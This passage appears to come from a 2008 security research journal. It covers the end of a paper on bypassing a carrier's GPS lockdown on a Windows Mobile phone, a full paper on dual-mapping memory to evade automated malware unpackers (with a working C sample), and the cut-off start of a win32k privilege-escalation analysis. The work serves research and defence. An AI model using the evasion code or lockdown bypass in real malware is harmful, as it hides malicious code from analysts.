default gateway, as a connection to a carrier-supplied server (known as a
"Position Determining Entity", or PDE) must be made. The PDE servers that are
operated by Verizon Wireless are firewalled off from outside their network, and
in addition, it is possible that they use the IP address assigned to the user
making a request as part of the location assistance process.
Unfortunately, the debugger connection to a Windows Mobile-based device, for
all the Windows Mobile debuggers that the author had access to (IDA Pro 5.1 and
the Visual Studio 2005 debugger), requires an ActiveSync link. While the
ActiveSync link is enabled, it supersedes the cellular link for data traffic.
Even when the computer on the other end of the ActiveSync link was connected to
the cellular network via a separate cellular modem, the GPS functionality did
not operate, due to an apparent check of whether the cellular link is the
highest-precedence data link on the device.
This means that observing many of the oemgpsOne.dll calls relating to position
fixes would not be possible with the standard debugging tools available. The
solution that was implemented for this problem was to write a proxy DLL that
exports every symbol exported by oemgpsOne.dll, logs the parameters of any such
API calls, and then forwards them on to the underlying oemgpsOne.dll
implementation (logging return values and out parameters after the actual
implementation function in question returned).
While potentially labor-intensive, in terms of creating the proxy DLL, such a
technique is relatively simple on Windows. The usual procedure for such a task
would be to create the proxy DLL, place it in the directory containing the main
process image of the program to be hooked, and then load the real DLL with a
fully-qualified path name from inside the proxy DLL.
Unfortunately, Windows Mobile does not allow two DLLs with the same base name
to be loaded, even if a fully-qualified path is specified with a call to
LoadLibrary. Instead, the first DLL that happened to get loaded by any process
on the entire system matching the requested base name is returned. This means
that in order to load a proxy DLL, one of two approaches would need to be
taken.
The first such option is to rename the proxy DLL itself, along with the
filename of the imported DLL in the desired target module, by modifying the
actual desired target module itself on-disk. The second option is to rename
the DLL containing the implementation of the proxied functionality, and then
load that DLL by the altered name in the proxy DLL. Both approaches are
functionally equivalent on Windows Mobile; the author chose the former in
this case.
Through disassembly, a rough estimate of the prototypes of the various APIs
exported by oemgpsOne.dll was created, and from there, a proxy module
(oemgpsOneProxy.dll) was written to log specific API calls to a file for later
analysis. This approach allowed for relatively quick identification of any
arguments to oemgpsOne.dll calls which were not immediately obvious from static
disassembly, despite the lack of a debugger on the target when many of the
calls were made.
3.2. Implementing a Custom oemgpsOne.dll client
After discerning the prototypes for the various oemgpsOne.dll supporting APIs,
the next step in unlocking the built-in GPS hardware on the xv6800 was to write
a custom client program that utilized oemgpsOne.dll to retrieve decrypted
location values from the gpsOne chipset.
Although one approach to this task might be to attempt to disable the various
security checks present in LBSDriver.dll, it was deemed easier to re-implement
an oemgpsOne.dll client from scratch. In addition, this approach also allowed
the author to circumvent various implementation bugs and limitations present
in LBSDriver.dll.
Given the information gleaned from analyzing LBSDriver.dll's implementation of
the challenge-response and GPS decryption logic, and the API call logging from
the oemgpsOne.dll proxy module, writing a client for oemgpsOne.dll is merely an
exercise in writing the necessary code to connect all of the pieces together in
the correct fashion.
After valid GPS position data can be retrieved from oemgpsOne.dll, all that
remains is to write an adapter layer to connect programs written against the
standard Windows Mobile gpsapi.dll to the custom oemgpsOne.dll client.
However, there are inherent design limitations in the locked down GPS interface
that complicate the creation of a practical adapter to convert gpsapi.dll calls
into oemgpsOne.dll calls. For example, a naive implementation that might
involve creating a module to replace gpsapi.dll with a custom binary to make
inline calls to oemgpsOne.dll would run afoul of a number of pitfalls.
Specifically, as oemgpsOne.dll depends on gpsapi.dll, attempting to simply
replace gpsapi.dll with a custom module will break the very oemgpsOne.dll
functionality used to communicate with the GPS intermediate driver, due to
the previously mentioned "one dll for a given base name" Windows Mobile
limitation. In addition, it is not possible for two programs to simultaneously
operate as full clients of oemgpsOne.dll, as the challenge-response
mechanism operates globally and will not operate correctly should two
applications simultaneously attempt to engage it.
The most straightforward solution to the former issue is to simply rename a
copy of the stock gpsapi.dll, and then modify oemgpsOne.dll to refer to the
renamed gpsapi.dll. This opens the door to replacing the system-supplied
gpsapi.dll with a custom replacement gpsapi.dll implementing a client for
oemgpsOne.dll.
3.3. Multiplexing GPS Across Multiple Applications.
The GPS intermediate driver supports multiplexing the GPS hardware present on
a Windows Mobile-based device across multiple applications. However, as
previously noted, the locked down GPS interface breaks this functionality, as
no two programs can participate in the full challenge-response protocol for
keeping the gpsOne hardware active simultaneously.
Although the first program to start could be designated the "master", and thus
be responsible for challenge-response operations (with secondary programs
merely decrypting position data locally), this introduces a great deal of extra
complexity. Specifically, significant coordination issues arise relating to
cleanly handling the fact that third-party GPS-enabled programs are typically
unaware of each other. Thus, work must be done to handle the case where one
program having previously activated the gpsOne hardware exits, leaving any
remaining programs still using GPS with the problem of selecting a new "master"
program to perform challenge-responses with the GPS intermediate driver.
Given the difficulties of such an approach, a different model was chosen, such
that the replacement gpsapi.dll acts as a client of a server program which then
mediates access to the locked down GPS interface on behalf of all active GPS-
enabled programs. Although there exist synchronization and coordination issues
with this model, they are simpler to deal with than the alternative
implementation.
3.4. Caveats.
While the resultant GPS adapter system supports third-party programs that
utilize gpsapi.dll, any programs using the virtual NMEA serial port interface
will not operate successfully. Unfortunately, the same approach towards the
replacement of gpsapi.dll is not feasible with the APIs utilized in
communication with a serial port, by virtue of the sheer number of function
calls present in coredll.dll that would need to be forwarded on to the real
coredll.dll via a proxy module.
4. Bugs in the Verizon Wireless xv6800 gpsOne Lock Down Logic
Few programs designed to lock down portions of a system via security through
obscurity are bug-free, and the GPS lockdown logic on the xv6800 is certainly
no exception. The lockdown code has a number of localized and systemic issues
pervading the current implementation.
4.1. Thread Safety Issues
There are a number of threading related issues present throughout the locked
down GPS interface.
- The GPS intermediate driver does not properly synchronize the case of
multiple simultaneous callers using the extended IOCTLs not present on a
stock GPS intermediate driver implementation.
- LBSDriver.dll utilizes a dedicated thread for performing challenge-response
processing with the GPS intermediate driver. However, there is no
synchronization provided between the challenge-response thread and the thread
that retrieves and decrypts GPS position data, leading to a race condition in
which it might be possible for decryption to return garbage data.
4.2. API Mis-use
In several cases, LBSDriver.dll fails to use standard Windows APIs correctly.
- LBSDriver.dll performs dangerous operations in DllMain, such as loading
other DLLs, despite such operations being long-documented as blatantly
illegal and prone to difficult to diagnose deadlocks (particularly on a
device with extremely limited debugging support).
- When LBSDriver.dll performs the AES decryption on the latitude/longitude
values returned by oemgpsOne.dll, it creates a CryptoAPI key blob, in order
to import the derived AES key into a CryptoAPI key object (via the use of the
CryptImportKey routine). However, the length of the key blob passed to
CryptImportKey is actually too short. This would appear to make
LBSDriver.dll dependent on a bug in the Windows Mobile 6
implementation of CryptoAPI. Specifically, the key blob format for a
symmetric key includes a count in bytes of key material, and the data passed
to CryptImportKey is such that the key blob structure claims to extend beyond
the length of bytes that LBSDriver.dll specifies for the key blob structure
itself. It might even be the case that this represents a security problem in
CryptoAPI due to apparently non-functional length checking in this case, as
key blobs are documented to be transportable across an untrusted medium.
To illustrate the second issue, consider the following code fragment:
//
// Initialize the header.
//
BlobHeader = (BLOBHEADER *)KeyBlob;
BlobHeader->bType = PLAINTEXTKEYBLOB;
BlobHeader->bVersion = 2;
BlobHeader->reserved = 0;
BlobHeader->aiKeyAlg = CALG_AES_128;
//
// Initialize the key length in the BLOB payload.
//
*(DWORD *)(&KeyBlob[ 0x08 ] ) = KeyLength;
//
// Initialize the key material in the BLOB payload.
//
memcpy( KeyBlob + 0x0C, KeyData, KeyLength );
//
// Generate a CryptoAPI AES-128 key object from our key material.
//
if (!CryptImportKey(
CryptProv,
KeyBlob,
KeyLength, // BUGBUG: Should really be KeyLength + 0x0C...
NULL,
0,
&Key))
{
break;
}
Contrary to the Microsoft-supplied documentation [9] for CryptImportKey, the
third parameter passed to CryptImportKey ("dwDataLen", as "KeyLength" in this
example) is too short for the key blob specified, as the length field in the
blob header itself describes the key material as being "KeyLength" bytes.
Thus, the LBSDriver.dll module would appear to depend upon either CryptoAPI or
the default Microsoft cryptographic provider on Windows Mobile not validating
blob header key material lengths properly, as the supplied blob header claims
that the key material extends outside the provided blob buffer (given the
length passed to CryptImportKey).
Microsoft-supplied sample code [10] illustrates the correct construction of a
symmetric key blob, and does not suffer from this deficiency.
5. Suggested Countermeasures
Although several attempts were made throughout the GPS lockdown system on the
xv6800 to deter third party programs from successfully communicating with the
integrated gpsOne hardware, the bulk of these checks were relatively easy to
overcome. In fact, the principal barriers to the GPS unlocking project were
a lack of viable debugging tools for the platform, and an unfamiliarity with
Windows Mobile on the part of the author.
Nevertheless, several improvements could have been made to improve the
resilience of the lockdown system.
- Deny assisted GPS availability at the PDE if the user's account is not
provisioned for GPS, or if the privacy policy configured time of day
restrictions are not met. Because the security and lockdown checks are
implemented client-side on the xv6800, they are relatively easily bypassable
by third party applications. However, if the device is capable of performing
a standalone GPS location fix, blocking assisted GPS access will not provide
a hard defense.
- Require code signing from a Verizon Wireless CA for all applications loaded
on the device. Users are, however, unlikely to purchase a device configured
in such a manner, as expensive smartphone-class devices are often sold under
the expectation that third party programs will be easily loadable.
- Move enforcement checks for operations such as time of day requirements for
the user's desired location privacy policy into the radio firmware and out of
the operating system environment. The radio firmware environment is
significantly closer to a "black box" than the operating system which runs on
the application core of the xv6800. Furthermore, if the software loader on
the xv6800 were secured and locked down, the radio firmware could be made
significantly more proof against unauthorized modifications. One could
envision a system wherein the radio firmware communicates with the carrier's
network out-of-band (with respect to the general-purpose operating system
loaded on the device) to determine when it had been authorized by the user to
provide location information to applications running on the device.
The client-side checks on the GPS lockdown system are likely a heritage of the
fact that VZ Navigator and LBSDriver.dll appear to be more or less ports from
BREW-based "dumb phones", where the application environment is more tightly
controlled by code signing requirements. The Windows Mobile operating
environment is significantly different in this respect, however.
Additionally, the author would submit that, from the perspective of attempting
to safeguard users from unauthorized harvesting of their location data (a key
reason cited by Verizon Wireless with respect to the certification process
needed for an application to become approved for location-aware functionality),
a hardware switch to enable or disable the GPS hardware on the device would be
a far better investment. In fact, the xv6800 already possesses a hardware
switch for 802.11 functionality; if this was instead changed to enable or
disable the gpsOne chipset in future smartphone designs, users could be assured
that their location information would be truly secure.
6. Debugging and Development Challenges on Windows Mobile and the xv6800.
Windows Mobile has a severely reduced set of standard debugging tools as
compared to the typically highly rich debugging environment available on most
Windows-derived systems. This greatly complicated the process of understanding
the underlying implementation details of the GPS lockdown system.
The author had access to two debuggers that could be used on the xv6800 at the
time of this writing: the Visual Studio 2005 debugger, and the IDA Pro 5.1
debugger. Both programs have serious issues in and of their own respective
rights.
Unfortunately, there does not appear to be any support for WinDbg, the author's
preferred debugging tool, when using Windows CE-based systems, such as Windows
Mobile. Although WinDbg can open ARM dump files (and ARM PE images as a dump
file), and can disassemble ARM instructions, there is no transport to connect
it to a live process on an ARM system.
The relatively immature state of debugging tools for the Windows Mobile
platform was a significant time consumer in the undertaking of this project.
6.1. Limitations of the Visual Studio Debugger
Visual Studio 2005 has integrated support for debugging Windows Mobile-based
applications. However, this support is riddled with bugs, and the quality of
the debugging experience rapidly diminishes if one does not have symbols and
binaries for all images in the process being debugged present on the debugger
machine. In particular, the Visual Studio 2005 debugger seems to be unable to
disassemble at any location other than the current pc register value without
having symbols for the containing binary available. (In the author's
experience, attempting such a feat will fail with a complaint that no code
exists at the desired address.)
Additionally, there seems to be no support for export symbols on the Windows
Mobile debugger component of Visual Studio 2005. This, coupled with the lack
of freely-targetable disassembly support, often made it difficult to identify
standard API calls from the debugger. The author recommends falling back to
static disassembly whenever possible, as available static disassembly tools,
such as IDA Pro 5.1 Advanced or WinDbg, provide a superior user experience.
6.2. Limitations of the IDA Pro 5.1 Debugger
Although IDA Pro 5.1 supports debugging of Windows Mobile-based programs, the
debugger has several limitations that made it unfortunately less practical than
the Visual Studio 2005 debugger. Foremost, it would appear that the debugger
does not support suspending and breaking into a Windows Mobile target without
the Windows Mobile target voluntarily breaking in (such as by hitting a
previously defined breakpoint).
In addition, the default security policy configuration on the device needed to
be modified in order to enable the debugger to connect at all (see note [3]).
6.3. Replacing a Firmware-baked Execute-in-place Module
Windows Mobile supports the concept of an execute in place (or XIP) module.
Such an executable image is stored split up into PE sections on disk (and does
not contain a full image header). XIP modules are "baked" into the firmware
image, and cannot be overwritten without flashing the OS firmware on the
device. Conversely, it is not possible to simply copy an XIP module off of the
device and on to a conventional storage medium.
The advantage of XIP "baked" modules comes into play when one considers the
limited amount of RAM available on a typical Windows Mobile device. XIP
modules are pre-relocated to a guaranteed available base address, and do not
require any runtime alterations to their backing memory when mapped. As a
result, XIP modules can be backed entirely by ROM and not RAM, decreasing the
(scarce) RAM that must be devoted to holding executable code.
It is possible to supersede an XIP "baked" module without flashing the OS image
on the xv6800, however. This involves a rather convoluted procedure, which
amounts to the following steps, for a given XIP module residing in a particular
directory:
- First, rename the replacement module such that it has a filename which does
not conflict with any files present in the directory containing the XIP
module to supersede.
- Next, copy the renamed replacement module into the directory containing the
desired XIP module to supersede.
- Finally, rename the replacement module to have the same filename as the
desired XIP module.
Deleting the filename associated with the superseded XIP module will revert the
device back to the ROM-supplied XIP module. This property proves beneficial in
that it becomes easy to revert back to stock operating system-supplied modules
after temporarily superseding them.
6.4. Import Address Table Hooking Limitations
One avenue considered during the development of the replacement gpsapi.dll
module was to hook the import address tables (IATs) of programs utilizing
gpsapi.dll.
Unfortunately, import table hooking is a significantly more complicated affair
on Windows Mobile-based platforms than on standard Windows. The image headers
for a loaded image are discarded after the image has been mapped, and the IAT
itself is often relocated to be non-contiguous with the rest of the image.
This relocation is possible as there appears to be an implicit restriction
that all references to an IAT address on ARM PE images must indirect through a
global variable that contains the absolute address of the desired IAT address.
As a result, there are no relative references to the IAT, and thus absolute
address references may be fixed up via the aid of relocation information. It
is not clear to the author what purpose this relocation of the IAT outside
the normal image confines serves on Windows Mobile for non-XIP modules
that are loaded into device RAM.
Furthermore, the HMODULE of an image does not equate to its load base address
on Windows Mobile. One can retrieve the real load base address of a module on
Windows Mobile via the GetModuleInformation API. This is a significant
departure from standard Windows.
Due to these limitations, the author elected not to pursue IAT hooking for the
purposes of the GPS unlocking project. Although there is code publicly
available to cope with the relocation of an image's IAT, it appears to be
dependent on kernel data structures for which the author did not have a
conveniently available and accurate definition corresponding to the Windows
Mobile kernel shipping on the xv6800.
7. Conclusion
Locking down the gpsOne hardware on the xv6800 such that it can only be
utilized by Verizon Wireless certified and approved applications can be seen in
two lights. One could consider such actions an anti-competitive move, designed
to lock out third party programs from having the opportunity to compete with
VZ Navigator. However, such reasoning is fairly questionable, given that
other carriers in the United States (particularly GSM-based carriers) typically
fully support third party GPS-enabled applications on their devices. As
consumers expect more full-featured and advanced devices, locking down devices
to only carrier-approved functionality is becoming an increasingly large
competitive liability for companies seeking to differentiate their networks
and devices in today's saturated mobile phone markets.
Furthermore, Verizon Wireless's currently shipping location-enabled application
for the xv6800, VZ Navigator, remains competitive (by virtue of features such
as turn-by-turn voice navigation, traffic awareness, and automatic re-routing)
even if the built-in GPS hardware on the xv6800 were to be unlocked for
general-purpose use. Freely available navigation programs lack these features,
and commercial applications are based on a different pricing model than the
periodic monthly fee model used by VZ Navigator at the time of this article's
writing.
A more reasonable (although perhaps misguided) rationale for locking down the
gpsOne hardware is to protect users from having their location harvested or
tracked by malicious programs. Unfortunately, the relatively open nature of
Windows Mobile 6, and a lack of particularly effective privilege-level
isolation on Windows Mobile 6 after any unsigned code is permitted to run both
conspire to greatly diminish the effectiveness of the protection schemes that
are implemented on the xv6800.
Whether this is a legitimate concern or not remains, of course, up for debate,
but it is clear that the lockdown system as present on the xv6800 is not
particularly effective against blocking access to un-approved third party
applications.
Future releases of Windows Mobile claim support for a much more effective
privilege isolation model that may provide true security from unprivileged,
malicious programs. However, in currently shipping devices, the operating
system cannot be relied upon to provide this protection. Relying on security
through obscurity to implement lockdown and protection schemes may then seem
attractive, but such mechanisms rarely provide true security.
As mobile phones advance toward becoming more and more powerful devices, in
effect becoming small general-purpose computers, privacy and security concerns
begin to gain greater relevance. With the capability to record a user's
location, audio, and environment (via the built-in microphones and cameras
present on virtually all modern-day phones), there arises the chance of
serious privacy breaches, especially given that modern-day smartphones have
historically not seen the more rigorous level of security review that is
slowly becoming more commonplace on general-purpose computers.
One simple and elegant potential solution to these privacy risks is to simply
provide hardware switches to disable sensitive components, such as cameras or
embedded GPS hardware. In keeping with this philosophy, the author would
encourage Verizon Wireless to fully open up their devices, and defer to simple
and secure methods to allow users to manage their sensitive information, such
as physical hardware switches.
Bibliography:
[1] Verizon Wireless. Commercial Location Based Services.
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSLanding.jsp; accessed October 10, 2008
[2] Verizon Wireless. LBS Application Questions ("What can I do to ensure that my application is accepted, and to ensure a smooth certification process?").
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#LBSAppQues7; accessed October 10, 2008
[3] Daniel Álvarez. Debugging Windows Mobile 6 Applications with IDA.
http://dani.foroselectronica.es/debugging-windows-mobile-6-applications-with-ida-69/; accessed October 10, 2008
[4] Microsoft. GPS Intermediate Driver Reference.
http://msdn.microsoft.com/en-us/library/ms850332.aspx; accessed October 10, 2008
[5] Microsoft. GPSOpenDevice.
http://msdn.microsoft.com/en-us/library/bb202113.aspx; accessed October 10, 2008
[6] Microsoft. GPSGetPosition.
http://msdn.microsoft.com/en-us/library/bb202050.aspx; accessed October 10, 2008
[7] Verizon Wireless. LBS Application Questions ("Can the user change their privacy settings?").
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#GenQues16; accessed October 10, 2008
[8] Microsoft. GetModuleFileName Function (Windows).
http://msdn.microsoft.com/en-us/library/ms683197(VS.85).aspx; accessed October 10, 2008
[9] Microsoft. CryptImportKey Function (Windows).
http://msdn.microsoft.com/en-us/library/aa380207(VS.85).aspx; accessed October 11, 2008
[10] Microsoft. Example C program: Importing a Plaintext Key (Windows).
http://msdn.microsoft.com/en-us/library/aa382383(VS.85).aspx; accessed October 11, 2008

Using dual-mappings to evade automated unpackers
10/2008
skape
mmiller@hick.org
Abstract: Automated unpackers such as Renovo, Saffron, and Pandora's Bochs
attempt to dynamically unpack executables by detecting the execution of code
from regions of virtual memory that have been written to. While this is an
elegant method of detecting dynamic code execution, it is possible to evade
these unpackers by dual-mapping physical pages to two distinct virtual address
regions where one region is used as an editable mapping and the second region
is used as an executable mapping. In this way, the editable mapping is
written to during the unpacking process and the executable mapping is used to
execute the unpacked code dynamically. This effectively evades automated
unpackers which rely on detecting the execution of code from virtual addresses
that have been written to.
Update: After publishing this article it was pointed out that the design of
the Justin dynamic unpacking system should invalidate evasion techniques that
assume that the unpacking system will only trap on the first execution attempt
of a page that has been written to. Justin counters this evasion technique
implicitly by enforcing W ^ X such that when a page is executed from for the
first time, it is marked as executable but non-writable. Subsequent write
attempts will cause the page to be marked as non-executable and dirty. This
logic is enforced across all virtual addresses that are mapped to the same
physical pages. This has the potential to be an effective countermeasure,
although there are a number of implementation complexities that may make it
difficult to realize in a robust fashion, such as those related to the
duplication of handles and the potential for race conditions when
transitioning page protections.
1. Background
There are a number of automated unpackers that rely on detecting the execution
of dynamic code from virtual addresses that have been written to. This section
provides some background on the approaches taken by these unpackers.
1.1 Malware Normalization
Christodorescu et al. described a method of normalizing programs which focuses
on eliminating obfuscation[2]. One of the components of this normalization
process consists of an iterative algorithm that is meant to produce a program
that is not self-generating. In essence, this algorithm relies on detecting
dynamic code execution to identify self-generated code. To support this
algorithm, QEMU was used to monitor the execution flow of the input program as
well as all memory writes that occur. If execution is transferred to an
address that has been written to, it is known that dynamic code is being
executed.
1.2 Renovo
Renovo is similar to the malware normalization technique in that it uses an
emulated environment to monitor program execution and memory writes to detect
when dynamic code is executed[3]. Renovo makes use of TEMU as the execution
environment for a given program. When Renovo detects the execution of code
from memory that was written to in the context of a given process, it extracts
the dynamic code and attempts to find the original entry point of the unpacked
executable.
1.3 Saffron
Saffron uses two approaches to dynamically unpack executables[5]. The first
approach involves using Pin's dynamic instrumentation facilities to monitor
program execution and memory writes in a manner similar to the emulated
approaches described previously. The second approach makes use of hardware
paging features to detect when execution is transferred to a memory region.
Saffron detects the first time code is executed from a page, regardless of
whether or not it is writable, and logs information about the execution to
support extracting the unpacked executable. This can be seen as a more
generic version of the technique used by OllyBonE which focused on using
paging features to monitor a specific subset of the address space[8].
OmniUnpack also uses an approach that is similar to Saffron[4].
1.4 Pandora's Bochs
Pandora's Bochs uses techniques similar to those used by Christodorescu and
Renovo[1]. Specifically, Pandora's Bochs uses Bochs as an emulation environment
in which to monitor program execution and memory writes to detect when dynamic
code is executed.
1.5 Justin
Justin is a recently developed dynamic unpacking system that was presented at
RAID 2008 after the completion of the initial draft of this paper[9]. Justin
differs from previous work in that it uses hardware non-executable paging
support to enforce W ^ X on virtual address regions. When an execution
attempt occurs, an exception is generated and Justin determines whether or not
the page being executed from was written to previously. The authors of Justin
correctly identified the evasion technique described in the following section
and have attempted to design their system to counter it. Their approach
involves verifying that the protection attributes are the same across all
virtual addresses that map to the same physical pages. This should be an
effective countermeasure, although there is certainly room for attacking
implementation weaknesses, should any exist.
2. Dual-mapping
The automated unpackers described previously rely on their ability to detect
the execution of dynamic code from virtual addresses that have been written
to. This implicitly assumes that the virtual address used to execute code
will be equal to an address that was written to previously. While this
assumption is safe in most circumstances, it is possible to use features
provided by the Windows memory manager to evade this form of detection.
The basic idea behind this evasion technique involves dual-mapping a set of
physical pages to two virtual address regions. The first region is considered
an editable mapping and the second region is considered an executable mapping.
The contents of the unpacked executable are written to the editable mapping
and later executed using the executable mapping. Since both mappings are
associated with the same physical pages, the act of writing to the editable
mapping indirectly alters the contents of the executable mapping. This evades
detection by making it appear that the code that is executed from the
executable mapping was never actually written to. This technique is
preferable to writing the unpacked executable to disk and then mapping it into
memory as doing so would enable trivial unpacking and detection.
Implementing this evasion technique on Windows can be accomplished using fully
supported user-mode APIs. First, a pagefile-backed section (anonymous memory
mapping) must be created using the CreateFileMapping API. The handle returned
from this function must then be passed to MapViewOfFile to create both the
editable and executable mappings. Finally, the dynamic code must be unpacked
into the editable mapping through whatever means and then executed using the
executable mapping. This is illustrated in the code below:
//
// Create a pagefile-backed section large enough to hold the unpacked code.
//
ImageMapping = CreateFileMapping(
    INVALID_HANDLE_VALUE, NULL,
    PAGE_EXECUTE_READWRITE | SEC_COMMIT,
    0, CodeLength, NULL);
//
// Map two views of the same section: an editable view that is written to
// during unpacking, and an executable view used to run the result.
//
EditableBaseAddress = MapViewOfFile(ImageMapping,
    FILE_MAP_READ | FILE_MAP_WRITE,
    0, 0, 0);
ExecutableBaseAddress = MapViewOfFile(ImageMapping,
    FILE_MAP_EXECUTE | FILE_MAP_READ | FILE_MAP_WRITE,
    0, 0, 0);
//
// Unpack into the editable view, then transfer control to the aliased
// executable view.
//
CopyMemory(EditableBaseAddress,
    CodeBuffer, CodeLength);
((VOID (*)())ExecutableBaseAddress)();
The example code provides an illustration of using this technique to execute
dynamic code. This technique should also be fairly easy to adapt to the
unpacking code used by existing packers. One consideration that must be made
when using this technique is that relocations must be applied to the unpacked
executable relative to the base address of the executable mapping. With that
said, the relocation fixups themselves must be applied to the editable mapping
in order to avoid tainting the executable mapping.
An additional evasion technique may also be necessary for certain dynamic
unpackers that monitor code execution from any virtual address, regardless of
whether or not it was previously written to. This is the case with Saffron's
paging-based automated unpacker[5]. For performance reasons, Saffron only logs
information the first time code is executed from a page. If the contents of
the code changes after this point, Saffron will not be aware of them. This
makes it possible to evade this form of unpacking by executing innocuous code
from each page of the executable mapping. Once this has finished, the actual
unpacked executable can be extracted into the editable mapping and then
executed normally. This evasion technique should also be effective against
Justin due to the fact that Justin does not trap on subsequent execution
attempts from a given virtual address[9].
While these evasion techniques are expected to be effective, they have not
been experimentally verified. There are a number of reasons for this. No
public version of Pandora's Bochs is currently available. However, its author
has indicated that this technique should be effective. Renovo provides a web
interface that can be used to analyze and unpack executables. No data was
received after uploading an executable that simulated this evasion technique.
The authors of Saffron have indicated that they expected this technique to be
effective.
3. Weaknesses
Perhaps the most significant weakness of the dual-mapping technique is that it
is not capable of evading all automated unpackers. For example, dynamic
unpacking techniques that strictly focus on control flow transfers, such as
PolyUnpack[7] and ParaDyn[6], should still be effective. However, this
weakness could be overcome by incorporating additional evasion techniques,
such as those mentioned in cited work[7].
Automated unpackers could also attempt to invalidate the dual-mapping
technique by monitoring writes and code execution in terms of physical
addresses rather than virtual addresses. This would be effective due to the
fact that both the editable and executable virtual mappings would refer to
the same physical addresses. However, this approach would likely require a
better understanding of operating system semantics since memory may be paged
in and out at any time.
4. Conclusion
The dual-mapping technique can be used by packers to evade automated unpacking
tools that rely on detecting dynamic code execution from virtual addresses
that have been written to. While this evasion technique is expected to be
effective in its current form, it should be possible for automated unpackers
to adapt to handle this scenario such as by monitoring writes to physical
pages or by better understanding operating system semantics that deal with
virtual memory mappings.
References
[1] L. Boehne. Pandora's bochs: Automatic unpacking of malware.
http://www.0x0badc0.de/PandorasBochs.pdf, Jan 2008.
[2] Mihai Christodorescu, Johannes Kinder, Somesh Jha, Stefan Katzenbeisser,
and Helmut Veith. Malware normalization. Technical Report 1539, University
of Wisconsin-Madison, Madison, Wisconsin, USA, November 2005.
[3] M. Gyung Kang, P. Poosankam, and H. Yin. Renovo: A hidden code extractor
for packed executables.
http://www.andrew.cmu.edu/user/ppoosank/papers/renovo.pdf, Oct 2007.
[4] L. Martignoni, M. Christodorescu, and S. Jha. OmniUnpack: Fast, generic,
and safe unpacking of malware.
http://www.acsac.org/2007/papers/151.pdf, December 2007.
[5] Danny Quist and Valsmith. Covert debugging: Circumventing software
armoring techniques. BlackHat USA, Aug 2007.
[6] K. Roundy. Analysis and instrumentation of packed binary code.
http://www.cs.wisc.edu/condor/PCW2008/paradyn_presentations/roundy-packedCode.ppt,
Apr 2008.
[7] P. Royal, M. Halpin, D. Dagon, R. Edmonds, and W. Lee. PolyUnpack:
Automating the hidden-code extraction of unpack-executing malware. 22nd
Annual Computer Security Applications Conference, Dec 2006.
[8] J. Stewart. Ollybone. 2006.
[9] Fanglu Guo, Peter Ferrie, and Tzi cker Chiueh. A study
of the packer problem and its solutions. In RAID, pages
98-115, 2008.

Analyzing local privilege escalations in win32k
10/2008
mxatone
mxatone@gmail.com
Abstract: This paper analyzes three vulnerabilities that were found in
win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a
major component of the GUI subsystem in the Windows operating system. These
vulnerabilities have been reported by the author and patched in MS08-025[1]. The
first vulnerability is a kernel pool overflow with an old communication
mechanism called the Dynamic Data Exchange (DDE) protocol. The second
vulnerability involves improper use of the ProbeForWrite function within
string management functions. The third vulnerability concerns how win32k
handles system menu functions. Their discovery and exploitation are covered.
1) Introduction
The design of modern operating systems provides a separation of privileges
between processes. This design restricts a non-privileged user from directly
affecting processes they do not have access to. This enforcement relies on
both hardware and software features. The hardware features protect devices
against unknown operations. A secure environment grants only the necessary
rights by filtering how programs interact with the overall system. This
mediation, however, increases the number of exposed interfaces, and with them
the security risks. Abusing operating system design or implementation flaws
in order to elevate a program's rights is called a privilege escalation.
During the past few years, userland code and its protections have improved.
A better understanding of operating system internals has made abnormal
behaviour detection easier, and the exploitation of classical weaknesses is
harder than it once was. Nowadays, local exploitation directly targets the
kernel. Kernel local
privilege escalation brings up new exploitation methods and most of them are
certainly still undiscovered. Even if the Windows kernel is highly protected
against known attack vectors, the operating system itself has a lot of
different drivers that contribute to its overall attack surface.
On Windows, the graphical user interface (GUI) is divided into both
kernel-mode and user-mode components. The win32k.sys driver handles user-mode
requests for graphic rendering and window management. It also redirects
DirectX calls on to the appropriate driver. For local privilege escalation,
win32k represents an interesting target as it exists on all versions of
Windows and some features have existed for years without modifications.
This article presents the author's work on analyzing the win32k driver to find
and report vulnerabilities that were addressed in Microsoft bulletin
MS08-025[1]. While the patch adds an overall protection layer, it addresses
three reported vulnerabilities on different parts of the driver. The Windows
graphics stack is very complex and this article will focus on describing some
of win32k's organization and functionalities. Any reader who is interested in
this topic is encouraged to look at MSDN documentation for additional
information.
The structure of this paper is as follows. In chapter 2, the win32k driver
architecture basics will be presented with a focus on vulnerable contexts.
Chapter 3 will detail how each of the three vulnerabilities was discovered and
exploited. Finally, chapter 4 will discuss possible security improvements for
the vulnerable driver.
2) Win32k design
Windows is based on a graphical user interface and cannot work without it.
Only Windows Server 2008 in server core mode uses a minimalist user
interface, but it shares the exact same components as typical user
interfaces. The win32k driver is a critical component in the graphics stack,
exporting more than 600 functions. It extends the System Service Descriptor
Table (SSDT) with another table called W32pServiceTable. This driver is not
as big as the main kernel module (ntoskrnl.exe), but its interaction with
user-mode is just as important. The service table for win32k contains less
than
300 functions depending on the version of Windows. The win32k driver commonly
transfers control to user-mode with a user-mode callback system that will be
explained in this part. The interface between user-mode modules and
kernel-mode drivers has been built in order to facilitate window creation and
management. This is a critical feature of Windows which may explain why
exactly the same functions can be seen across multiple operating system
versions.
2.1) General security implementation
The most important part of a driver in terms of security is how it
validates user-mode inputs. Each argument passed as a pointer must be a
valid user-mode address and must not be modifiable afterwards, to avoid
race conditions. This validation is often accomplished by comparing a
provided address against the base of kernel memory using functions such
as ProbeForRead and ProbeForWrite. Input passed through pointers is also
typically copied into local variables (capturing). The Windows kernel
design is very strict on this point. When you look deeper into win32k's
functions, you will see that they do not follow the same strict integrity
verifications made by the kernel. For example, consider the following
check made by the Windows kernel (translated to C):
NTSTATUS NTAPI NtQueryInformationPort(
    HANDLE PortHandle,
    PORT_INFORMATION_CLASS PortInformationClass,
    PVOID PortInformation,
    ULONG PortInformationLength,
    PULONG ReturnLength
)
{
    [...] // Prepare local variables
    if (AccessMode != KernelMode)
    {
        try {
            // Check submitted address - if incorrect, raise an exception
            ProbeForWrite(PortInformation, PortInformationLength, 4);
            if (ReturnLength != NULL)
            {
                if ((ULONG_PTR)ReturnLength > MmUserProbeAddress)
                    *(ULONG *)MmUserProbeAddress = 0; // raise exception
                *ReturnLength = 0;
            }
        } except(1) { // Catch exceptions
            return exception_code;
        }
    }
    [...] // Perform actions
}
We can see that the arguments are tested in a very simple way before
